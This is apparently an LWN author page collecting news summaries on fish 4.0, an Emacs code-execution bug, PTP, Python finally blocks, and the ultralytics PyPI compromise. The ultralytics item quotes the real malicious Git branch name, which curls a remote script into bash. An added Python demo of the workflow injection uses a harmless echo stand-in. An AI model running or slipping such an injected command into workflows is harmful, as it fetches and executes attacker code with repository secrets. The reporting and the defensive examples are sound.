All posts by daroc

Fish shell announces 4.0 release

Post Syndicated from daroc original https://lwn.net/Articles/1002820/

fish is a shell with a custom language and several affordances not available out of the box in other shells, such as directory-sensitive command completion. Although the project does not normally make beta releases, the newly announced 4.0 release will have one in order to ensure that no problems were introduced after a major effort to switch the code base from C++ to Rust.

fish is a smart and user-friendly command line shell with clever features that just work, without needing an advanced degree in bash scriptology. Today we are announcing an open beta, inviting all users to try out the upcoming 4.0 release.

fish 4.0 is a big upgrade. It’s got lots of new features to make using the command line easier and more enjoyable, such as more natural key binding and expanded history search. And under the hood, we’ve rebuilt the foundation in Rust to embrace modern computing.

[$] Emacs code completion can cause compromise

Post Syndicated from daroc original https://lwn.net/Articles/1002046/

Emacs has had a
few bugs related to accidentally
permitting the execution of untrusted code. Unfortunately, it seems as though
another bug of that sort has appeared — and may be harder to patch,
because the problem comes from the way Emacs handles expansion of Lisp macros in
code being analyzed. The
vulnerability is only practically exploitable in a non-default configuration, so
not every Emacs user has something to worry about. The Emacs
developers are reportedly working on a fix, but have not yet shared details
about it. In the meantime, every Emacs version since at least
26.1 (released in May 2018) through the current development version is vulnerable.

[$] Providing precise time over the network

Post Syndicated from daroc original https://lwn.net/Articles/1000434/

Handling time in a networked environment is never easy. The Network Time Protocol (NTP) has been used to synchronize clocks across the internet for almost 40 years — but, as computers and networks get faster, the degree of synchronization it offers is not sufficient for some use cases. The Precision Time Protocol (PTP) attempts to provide more precise time synchronization, at the expense of requiring dedicated kernel and hardware support. The Linux kernel has supported PTP since 2011, but the protocol has recently seen increasing use in data centers. As PTP becomes more widespread, it may be useful to have an idea how it compares to NTP.

Security updates for Friday

Post Syndicated from daroc original https://lwn.net/Articles/1002036/

Security updates have been issued by Debian (chromium, pgpool2, and smarty4), Fedora (chromium, linux-firmware, matrix-synapse, open62541, and thunderbird), Red Hat (kernel, kernel-rt, python3.11, python3.12, python3.9:3.9.18, python3.9:3.9.21, and ruby:2.5), SUSE (buildah, chromium, govulncheck-vulndb, java-1_8_0-ibm, libsvn_auth_gnome_keyring-1-0, python310-Django, qemu, and radare2), and Ubuntu (linux, linux-aws, linux-aws-6.8, linux-gcp, linux-gcp-6.8, linux-gke,
linux-ibm, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-oem-6.8,
linux-oracle, linux-oracle-6.8, linux-raspi, linux, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-ibm, linux-ibm-5.4,
linux-kvm, linux-raspi, linux-xilinx-zynqmp, linux-gkeop, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, php7.0, php7.2, python-asyncssh, and smarty3).

[$] Auto-tuning the kernel

Post Syndicated from daroc original https://lwn.net/Articles/998576/

The Linux kernel has many tunable parameters. While there is much advice available on the internet about how to set them, few people have the time to weed through the (often contradictory) explanations and choose appropriate values. One possible way to address this is a project called bpftune, a program that uses BPF to track various metrics about a running system and adjust the sysctl knobs appropriately. The program is developed by Oracle, and is available under a GPLv2 license. Bpftune is currently mostly focused on optimizing network settings, but the authors hope that the system is flexible enough to be extended to cover other settings.

Fedora Steering Council election interviews

Post Syndicated from daroc original https://lwn.net/Articles/1001522/

When the Fedora Engineering Steering Council (FESCo) is up for election, the project posts interviews of the candidates in order to help Fedora contributors make an informed choice. This year, the candidates are Zbigniew Jędrzejewski-Szmek, Tomáš Hrčka, Josh Stone, David Cantrell, Fabio Alessandro Locati, and Kevin Fenzi. All of them except for Locati are current members of the steering council. Voting is open until December 20.

[$] Finally continuing the discussion over continue in finally

Post Syndicated from daroc original https://lwn.net/Articles/1000635/

In 2019, the Python community had a lengthy discussion about changing the rules (that some find counterintuitive) on using break, continue, or return statements in finally blocks. These are all ways of jumping out of a finally block, which can interrupt the handling of a raised exception. At the time, the Python developers chose not to change things, because the consensus was that the existing behavior was not a problem. Now, after a report put together by Irit Katriel, the project is once again considering changing the language.
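What "interrupting the handling of a raised exception" means in practice, as an added example that is not part of the LWN article or of Katriel's report: each jump out of a finally block below silently discards the exception that was in flight, including SystemExit. The functions and inputs are constructed for illustration; continue inside finally requires Python 3.8 or later, while return and break have always been accepted.

```python
"""Added example (not from the LWN article): what happens when control jumps
out of a ``finally`` block in CPython.  ``continue`` in ``finally`` needs
Python 3.8 or later; ``return`` and ``break`` have always been accepted."""


def return_in_finally():
    # The ValueError is in flight when finally runs; return discards it.
    try:
        raise ValueError("never seen by the caller")
    finally:
        return "finally won"


def return_overrides_return():
    # A return in finally replaces the value the try block was returning.
    try:
        return "from try"
    finally:
        return "from finally"


def swallows_system_exit():
    # SystemExit (and KeyboardInterrupt) are discarded the same way, which
    # is the strongest argument for banning these jumps.
    try:
        raise SystemExit(1)
    finally:
        return "interpreter kept running"


def continue_in_finally(values):
    # continue inside finally skips the rest of the iteration and drops the
    # ZeroDivisionError raised for v == 0.
    results = []
    for v in values:
        try:
            results.append(10 // v)
        finally:
            if v == 0:
                continue
    return results


def break_in_finally(values):
    # break inside finally leaves the loop and drops the exception too.
    results = []
    for v in values:
        try:
            results.append(10 // v)
        finally:
            if v == 0:
                break
    return results


def continue_done_right(values):
    # The intent of continue_in_finally without hiding errors: name the
    # exception being skipped and let anything else propagate.
    results = []
    for v in values:
        try:
            results.append(10 // v)
        except ZeroDivisionError:
            continue
    return results


if __name__ == "__main__":
    print(return_in_finally(), return_overrides_return(), swallows_system_exit())
    print(continue_in_finally([1, 0, 2]), break_in_finally([1, 0, 2]))
    print(continue_done_right([1, 0, 2]))
```

The third function is the one to keep in mind when reading the discussion: a return placed in a finally block for cleanup purposes will keep a process alive through a SystemExit or Ctrl-C, and nothing in the code path tells the reader that this is happening.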

Abusing Git branch names to compromise a PyPI package

Post Syndicated from daroc original https://lwn.net/Articles/1001215/

A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. The GitHub account “OpenIM Robot” (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Unfortunately, ultralytics uses the pull_request_target GitHub Actions trigger to automate some of its continuous-integration tasks. That trigger runs the workflow from the base branch of the repository, with access to the repository’s secrets — but the script it ran was vulnerable to shell injection from the branch name of the pull request, so the command substitution embedded in the name above was executed with those secrets available. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI, adding a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already pulled the malicious script.

This class of problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.
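How the branch name turns into executed code, and what the safe form of the same step looks like, as an added example that is not code from LWN, GitHub or the ultralytics project: GitHub substitutes every ${{ expr }} into a step's text before the shell sees it, so a run: line that interpolates github.head_ref hands the PR author a shell injection, whereas an expression placed under env: reaches the script only as a variable. The branch name, the two workflow steps and the sample workflow below are constructed; the branch name keeps the ${IFS} trick from the real payload (Git refs cannot contain spaces) but only echoes a marker. The script is a toy model of the runner, not GitHub's implementation.

```python
"""Toy model of how a GitHub Actions ``run:`` step is built and executed.
Added example for this article; it is not code from LWN, GitHub or the
ultralytics project, and the workflow steps and branch name below are
constructed.

GitHub substitutes every ``${{ expr }}`` into the step's text *before* the
shell sees it.  If the expression carries data the PR author controls (the
head branch name here), that data is parsed as shell source.  Passing it via
``env:`` and referencing ``"$HEAD_REF"`` lets the shell expand it as data.
"""
import os
import re
import subprocess

# Constructed, harmless stand-in for the branch name quoted in the article.
# Git refs cannot contain spaces, so the real payload used brace expansion
# and ${IFS} to build a command; this one uses ${IFS} and only echoes.
ATTACKER_BRANCH = "openimbot:$(echo${IFS}INJECTED${IFS}via${IFS}branch)"

# Step in the shape that makes pull_request_target workflows exploitable.
UNSAFE_STEP = {"run": 'echo "Checking out ${{ github.head_ref }}"'}

# Hardened step: the same command, with the expression moved into env:.
SAFE_STEP = {
    "env": {"HEAD_REF": "${{ github.head_ref }}"},
    "run": 'echo "Checking out $HEAD_REF"',
}

_HEAD_REF_EXPR = re.compile(r"\$\{\{\s*github\.head_ref\s*\}\}")


def expand(text, head_ref):
    """Textual substitution of ${{ github.head_ref }}, as the runner does it."""
    return _HEAD_REF_EXPR.sub(lambda _m: head_ref, text)


def run_step(step, head_ref):
    """Expand ${{ }} in the script and in env: values, then run the script
    with bash (the default shell on Linux runners).  Returns stdout."""
    script = expand(step["run"], head_ref)
    env = dict(os.environ)
    for name, value in step.get("env", {}).items():
        env[name] = expand(value, head_ref)
    result = subprocess.run(["bash", "-c", script], env=env,
                            capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")


# PR-controlled expressions that must not appear inside a run: script.
_UNTRUSTED_EXPR = re.compile(
    r"\$\{\{\s*github\.(head_ref|event\.pull_request\."
    r"(title|body|head\.ref|head\.label))\s*\}\}")

# Constructed workflow excerpt for the audit helper below; line 6 is unsafe.
SAMPLE_WORKFLOW = """\
on: pull_request_target
jobs:
  ci:
    runs-on: ubuntu-latest
    steps:
      - run: git checkout ${{ github.head_ref }}
      - env:
          HEAD_REF: ${{ github.head_ref }}
        run: git checkout "$HEAD_REF"
"""


def unsafe_run_lines(workflow_text):
    """1-based numbers of single-line run: steps that splice PR-controlled
    expressions into the script text (multi-line run: | blocks are not
    parsed here)."""
    hits = []
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        if re.search(r"(^|\s)run:", line) and _UNTRUSTED_EXPR.search(line):
            hits.append(lineno)
    return hits


if __name__ == "__main__":
    print("unsafe:", run_step(UNSAFE_STEP, ATTACKER_BRANCH))
    print("safe:  ", run_step(SAFE_STEP, ATTACKER_BRANCH))
    print("suspicious run: lines:", unsafe_run_lines(SAMPLE_WORKFLOW))
```

The env: pattern only protects the script text. A pull_request_target workflow that checks out the PR's head and then runs anything from it (build scripts, test hooks) is still executing the PR author's code with the repository's secrets in reach, so a grep for interpolated expressions like the one above is a necessary check, not a sufficient one.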

Security updates for Friday

Post Syndicated from daroc original https://lwn.net/Articles/1001164/

Security updates have been issued by AlmaLinux (firefox, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, python3:3.6.8, and thunderbird), Debian (clamav), Fedora (pam), Red Hat (firefox, postgresql:13, postgresql:15, python-tornado, redis:7, ruby, ruby:2.5, and ruby:3.1), SUSE (avahi, docker-stable, java-1_8_0-openjdk, libmozjs-128-0, obs-scm-bridge, php8, and teleport), and Ubuntu (ghostscript, needrestart, and shiro).

[$] Rust’s incremental compiler architecture

Post Syndicated from daroc original https://lwn.net/Articles/997784/

The traditional structure of a compiler forms a pipeline — parsing, type-checking, optimization, and code-generation, usually in that order. But modern programming languages have requirements that are ill-suited to such a design. Increasingly, compilers are moving toward other designs in order to support incremental compilation and low-latency responses for uses like integration into IDEs. Rust has, for the last eight years, been pursuing a particularly unusual design; in that time compile times have substantially improved, but there’s still more work to be done.

Security updates for Friday

Post Syndicated from daroc original https://lwn.net/Articles/1000185/

Security updates have been issued by Debian (firefox-esr, redis, twisted, and tzdata), Fedora (firefox, nss, pam, rust-rustls, rust-zlib-rs, thunderbird, tuned, and xen), and SUSE (cobbler, kernel, libjxl-devel, libuv, postgresql12, postgresql14, postgresql15, python-waitress, seamonkey, tomcat, and tomcat10).

Giving thanks for the LWN community

Post Syndicated from daroc original https://lwn.net/Articles/1000097/

Earlier today, one of our subscribers, anselm, posted the one millionth item in our database during a discussion in the comments about the GPL. One million articles and comments is a big milestone — one representing twenty two years of work by both the editors of LWN and the community. I think reaching this milestone on Thanksgiving is a lovely coincidental reminder of how far LWN has come, and how that wouldn’t have been possible without your support. So thank you for reading.

[$] NonStop discussion around adding Rust to Git

Post Syndicated from daroc original https://lwn.net/Articles/998115/

The Linux kernel community’s discussions about including Rust have gotten a lot of attention, but the kernel is not the only project wrestling with the question of whether to allow Rust. The Git project discussed the prospect in January, and then again at the Git Contributor’s Summit in September. Complicating the discussion is the Git project’s lack of a policy on platform support, and the fact that it does already have tools written in other languages. While the project has not committed to using or avoiding Rust, it seems like only a matter of time until maintainers will have to make a decision.

Security updates for Friday

Post Syndicated from daroc original https://lwn.net/Articles/999102/

Security updates have been issued by Debian (postgresql-13, postgresql-15, and webkit2gtk), Fedora (libsndfile, microcode_ctl, and trafficserver), Mageia (kanboard, kernel, kmod-xtables-addons, kmod-virtualbox, and bluez, kernel-linus, opendmarc, and radare2), Oracle (.NET 9.0, bubblewrap and flatpak, buildah, expat, firefox, grafana, grafana-pcp, kernel, krb5, libsoup, libvpx, NetworkManager-libreswan, openexr, pcp, python3.11, python3.11-urllib3, python3.12, python3.9, squid, thunderbird, tigervnc, and webkit2gtk3), Red Hat (.NET 9.0, binutils, expat, grafana-pcp, kernel, libsoup, NetworkManager-libreswan, openexr, python3.11, python3.12, python39:3.9, squid, tigervnc, and webkit2gtk3), SUSE (chromedriver, cobbler, govulncheck-vulndb, and icinga2), and Ubuntu (linux-lowlatency, linux-lowlatency-hwe-6.8, python2.7, and zbar).

Plans for CHICKEN 6

Post Syndicated from daroc original https://lwn.net/Articles/998856/

CHICKEN Scheme, a portable Scheme compiler, is gearing up for its next major release. Maintainer Felix Winkelmann has shared an article about what changes to expect in version 6 of the language, including better Unicode support and support for the R7RS (small) Scheme standard.

Every major release is a chance to fix long-standing problems with the codebase and to address bad design decisions. CHICKEN is now nearly 25 years old and we had many major overhauls of the system. Sometimes these caused a lot of pain, but still we always try to improve things and hopefully make it more enjoyable and practical for our users. There are places in the code that are messy, too complex, or that require cleanup or rewrite, always sitting there waiting to be addressed. On the other hand CHICKEN has been relatively stable compared to many other language implementations and has a priceless community of users that help us improve it. Our users never stop reminding us of what could be better, where the shortcomings are, where things are hard to use or inefficient.

Security updates for Wednesday

Post Syndicated from daroc original https://lwn.net/Articles/998854/

Security updates have been issued by Debian (guix, libmodule-scandeps-perl, needrestart, and thunderbird), SUSE (gh), and Ubuntu (kernel, linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp,
linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle, linux, linux-aws, linux-gcp, linux-gcp-6.8, linux-gke, linux-hwe-6.8,
linux-ibm, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency,
linux-oem-6.8, linux-oracle, linux-raspi, linux-iot, linux-lowlatency, linux-lowlatency-hwe-6.8, needrestart, python2.7, python3.10, python3.12, python3.8, and Waitress).

Security updates for Friday

Post Syndicated from daroc original https://lwn.net/Articles/998291/

Security updates have been issued by Debian (curl and unbound), Fedora (krb5 and microcode_ctl), Red Hat (kernel and kernel-rt), SUSE (glib2, python3-wxPython, and ucode-intel), and Ubuntu (golang-1.17, golang-1.18, libgd2, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-gke, linux-raspi, linux-raspi, linux-raspi-5.4, and php7.0, php7.2).